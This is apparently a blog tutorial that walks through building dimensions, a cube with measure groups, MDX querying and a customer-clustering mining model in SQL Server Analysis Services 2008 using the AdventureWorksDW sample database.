 In the Specify Source Information page, you need to select the DSV for creating the dimension, select the main table from which the dimension is to be designed, specify the key columns for the dimension, and optionally specify a name column for the dimension key value. By default, the first DSV in your project is selected. Because the current project has only one DSV (the Adventure WorksDW DSV), it is selected. Select the DimGeography table from the Main table drop – down list.

 Click the Next button to proceed to the next step in the Dimension Wizard.

 The Dimension Wizard now analyzes the DSV to detect any outward – facing relationships from the DimGeography table. An outward – facing relationship is a relationship between the DimGeography table and another table, such that a column in the DimGeography table is a foreign key related to another table. The Select Related Tables screen shows that the wizard detected an outward relationship between the DimGeography table and the DimSalesTerritory table. In this example you will be modeling the DimGeography table as a star schema table instead of snowflake schema. Deselect the DimSalesTerritory table and click next.

 The Select Dimension Attributes screen of the Dimension Wizard displays the columns of the main table that have been selected for the dimension you’re creating.

 Select all the attributes of the DimGeography table (all the attributes in the screen), leave their Attribute Type as Regular, allow them to be browsed, and click next.

 The final screen of the Dimension Wizard shows the attributes that will be created for the dimension based on your choices in the wizard. Click the Finish button.

Open the DimGeography dimension by double clicking on it in the solution explorer. In the Dimension structure tab you can see all the table attributes that have been added to this dimension. In the hierarchies’ pane, drag and drop the English country region name attribute followed by the State Province Name followed by the city and then the postal code. Then you have to build the relationships among these attributes in the hierarchy by clicking on the attribute relationships tab, and then dragging the postal code attribute towards the city, this means that the postal code value determines

the city. Drag the city towards the state. Drag the state towards the country. This will build the functional dependencies among the attributes in the hierarchy. Then you have to ensure that the city value is unique in determining the state name value by setting the key columns property of the city attribute to both the state province code and city, and setting its name columns to the city attribute. Similarly set the key columns of the postal code attribute to the postal code, the city, and the state province code attributes, and set its name columns to the postal code.

Deploy the project, by right clicking the project name and choosing deploy. After a successful deployment, you can browse the dimension by selecting the browse tab, where you can see all the data of the dimgeography table arranged according to their hierarchical levels.

b) Create the DimTime dimension

 Launch the Dimension Wizard by right – clicking Dimensions in the Solution Explorer and selecting New Dimension. When the welcome screen of the Dimension Wizard opens up, click next.

 In the Select Creation Method page of the wizard, select the “Use an existing table” option and click next.

 In the Specify Source Information page, select DimTime as the main table from which the dimension is to be designed and click next.

  In the Select Dimension Attributes page, in addition to the Date Key attribute, enable the checkboxes for the following attributes: Calendar Year, Calendar Semester, Calendar Quarter, English Month Name, and Day Number of Month.

 Set the Attribute Type for the “Calendar Year” attribute to Date Calendar Year.

 Set the Attribute Type for the “Calendar Semester” attribute to Date Calendar Half Year.

 Set the Attribute Type for the “Calendar Quarter” attribute to Date Calendar Quarter.

 Set the Attribute Type for the “English Month Name” attribute to Date Calendar Month.

 Set the Attribute Type for the “Day Number of Month” attribute to Date Calendar Day of Month.

 Create a multilevel hierarchy Calendar Date with the levels Calendar year, Calendar Semester, Calendar Quarter, Month (rename English Month Name), and Day (rename Day Number Of Month).

 Save the project and deploy it to the analysis services instance.

 Switch to the Browser pane of the DimTime dimension, where you can see that the date hierarchy is arranged according to the hierarchy that we defined above.

c) Create the DimEmployee dimension

 Launch the Dimension Wizard by right – clicking Dimensions in the Solution Explorer and selecting New Dimension. If the welcome screen of the Dimension Wizard opens up, click next.

 Make sure the “Use an existing table” option is selected and click next.

 In the Specify Source Information page, select DimEmployee as the main table from which the dimension is to be designed and click next.

 On the Select Related Tables screen, uncheck the DimSalesTerritory table and click next.

 In the Select Dimensions Attributes dialog, the Dimension Wizard has detected three columns of the DimEmployee table to be included as attributes. The Dimension Wizard will select columns if they are either the primary key of the table or a foreign key of the table or another table in the DSV. The attributes suggested by the Dimension Wizard in this example are the key attribute Employee Key, the parent – child attribute Parent Employee Key, and the Sales Territory Key, which is a foreign key column to the DimSalesTerritory table.

 Select all the columns of the DimEmployee table as attributes and click next.

 Double – click the DimEmployee dimension in the Solution Explorer to open the Dimension Designer.

 Change the NameColumn property of the Key attribute Dim Employee to FullName and deploy the project to your Analysis Services instance.

When you browse the Parent – Child hierarchy, you will see the members of the hierarchy showing the full names of the employees.

4) Creating a Cube Using the Cube Wizard

Cubes are the principal objects of an OLAP database that help in data analysis. Cubes are multidimensional structures that are primarily composed of dimensions and facts. The data from a fact table that is stored within the cube for analysis are called measures.

To build a new cube, follow these steps:

a) Right – click the Cubes folder and select New Cube. Click next on the introduction page to proceed.

b) In the Select Creation Method page you have the option to build a cube from existing tables, create an empty cube, or create a cube based on a template and generate new tables in the data source. Choose to build the cube from the existing tables in the Adventure Works DW data source. Click Next to proceed to the next step in the Cube Wizard.

c) The next page of the Cube Wizard is the Measure Group Tables selection page. You now must select one or more tables that will serve as fact tables for your Measure Group. The Suggest button on this screen can be used to have the Cube Wizard scan the DSV to detect the fact tables in the DSV and

detect fact tables. Click the Suggest button to have the Cube Wizard automatically select potential Measure Group tables. The Cube Wizard now scans the DSV to detect the fact and dimension tables in the DSV, automatically selects the candidate tables. Any table that has an outgoing relationship is identified as a candidate fact table, whereas a table that has an incoming relationship is detected as a dimension table. Select both the FactResellerSales and the FactInternetSales as the fact tables. And then select the measures that you need to include from these fact tables for the analysis task.

d) In the Select Existing Dimensions page, the Cube Wizard displays a list of all existing dimensions defined in the project. Accept the selection of all the dimensions and click next.

e) The Cube Wizard asks you to select any new dimensions to be created from existing tables in the data source that are not already used for dimensions in the project. You can deselect dimensions that are not needed for your cube on this page. This illustration will use the Fact tables only as measure groups and not for dimensions. Deselect the Fact Reseller Sales and Fact Internet Sales dimensions on this page and click next.

f) In the final page of the Cube Wizard you can specify the name of the cube to be created and review the measure groups, measures, dimensions, attributes, and hierarchies. Use the default name Adventure Works DW suggested by the Cube Wizard and click Finish.

After creating the cube, the new dimensions are automatically created. But these dimensions will have only their primary and foreign keys selected. You have to open each created dimension and select the attributes that you need to add from each table.

g) Press F5 to deploy, build and process the cube. Deploying the cube means building the cube according to the structure that you have defined, while processing the cube means computing all the aggregation values for all the cells in the cube.

You can add a new calculated measure to the cube by Right – clicking in the Script Organizer pane of the Calculation Scripts tab and entering the formula for this new measure.

Now that the cube has been deployed, switch the BIDS Cube Designer view to the Browser page. In the Browser page you will see three panes: a Measure Group pane, a Filter pane, and a Data pane. Suppose you want to analyze the Internet sales of products based on the promotions offered to customers and the marital status of those customers. First you would need to drag and drop [DimPromotion].[English Promotion Type] from the Measure Group pane to the OWC rows area. Next, drag and drop [Dim Customer].[Marital Status] from the Measure Group pane to the OWC columns area. Finally, drag and drop the measure [Sales Amount] from the Fact Internet Sales measure group to the Drop Totals or Detail Fields Here area of the OWC pane.

You can also use MDX queries to query the cube. These MDX queries are similar to the sql server queries. Just as SQL (Structured Query Language) is a query language used to retrieve data from relational databases, MDX (Multi – Dimensional expressions) is a query language used to retrieve data from multidimensional databases.

The format of MDX query is shown below:

SELECT [< axis expression >, [< axis expression > ...]]

FROM [< cube_expression >]

[WHERE [slicer expression]]

5) Creating a Mining Structure

Analysis Services 2008 provides nine data mining algorithms that can be utilized to solve various business problems. These algorithms can be broadly classified into five categories based on the nature of the business problem they can be applied to. They are:

1) Classification

2) Regression

3) Segmentation

4) Sequence analysis

5) Association

We aim at grouping customers that undergo similar characteristics.

To create a relational mining model, follow the following steps:

a) Right – click the Mining Structures folder in the Solution Explorer and select New Mining Structure as to launch the Data Mining Wizard that helps you to create data mining structures and models. Click the Next button.

b) Select the “From existing cube” radio button and click next.

c) Select Microsoft Clustering and click next.

d) Choose the Customer table as the primary table and enter the following attributes as inputs for building clusters:

Age, Yearly Income, Number of cars owned, Number of Children at home and Occupation.

You will now see the clustering mining model represented as several nodes with lines between these nodes. By default the clustering mining model groups the customer into ten different clusters. The number of clusters generated can be changed from a property for the cluster mining model. Each cluster is shown as a node in the cluster viewer. Darker shading on the node indicates that the cluster favors a specific input column and vice versa. If there is a similarity between two clusters, it is indicated by a line connecting the two nodes. Similar to the shade of the color node, if the relationship is stronger between two nodes, it is indicated via a darker line. You can move the slider on the left of the cluster diagram from All Links to Strongest Links. As you do this you can see the weaker relationships between the clusters are not displayed. You can change the cluster name by right – clicking the cluster and selecting Rename. You can select desired input columns of the mining model from the Shading Variable drop -

down to see the effect of the column on the various clusters. When you choose a specific shading variable column you need to choose one of the states of the column to be used as the shading variable for the clusters.

The Cluster Profiles view shows the relationship between the mining columns of the model and the clusters in a matrix format. The intersection cell of a specific column and a cluster shows a histogram bar of the various values of the column that are part of the cluster. The size of each bar reflects the number of items used to train the model.

The cluster Characteristics tab shows the characteristics of a single cluster and how the various states of the input columns make up the cluster.

The Cluster Discrimination tab shows the characteristics of a Cluster in comparison with the characteristics of the complement of this Cluster.

Follow

Get every new post delivered to your Inbox.

Join 55 other followers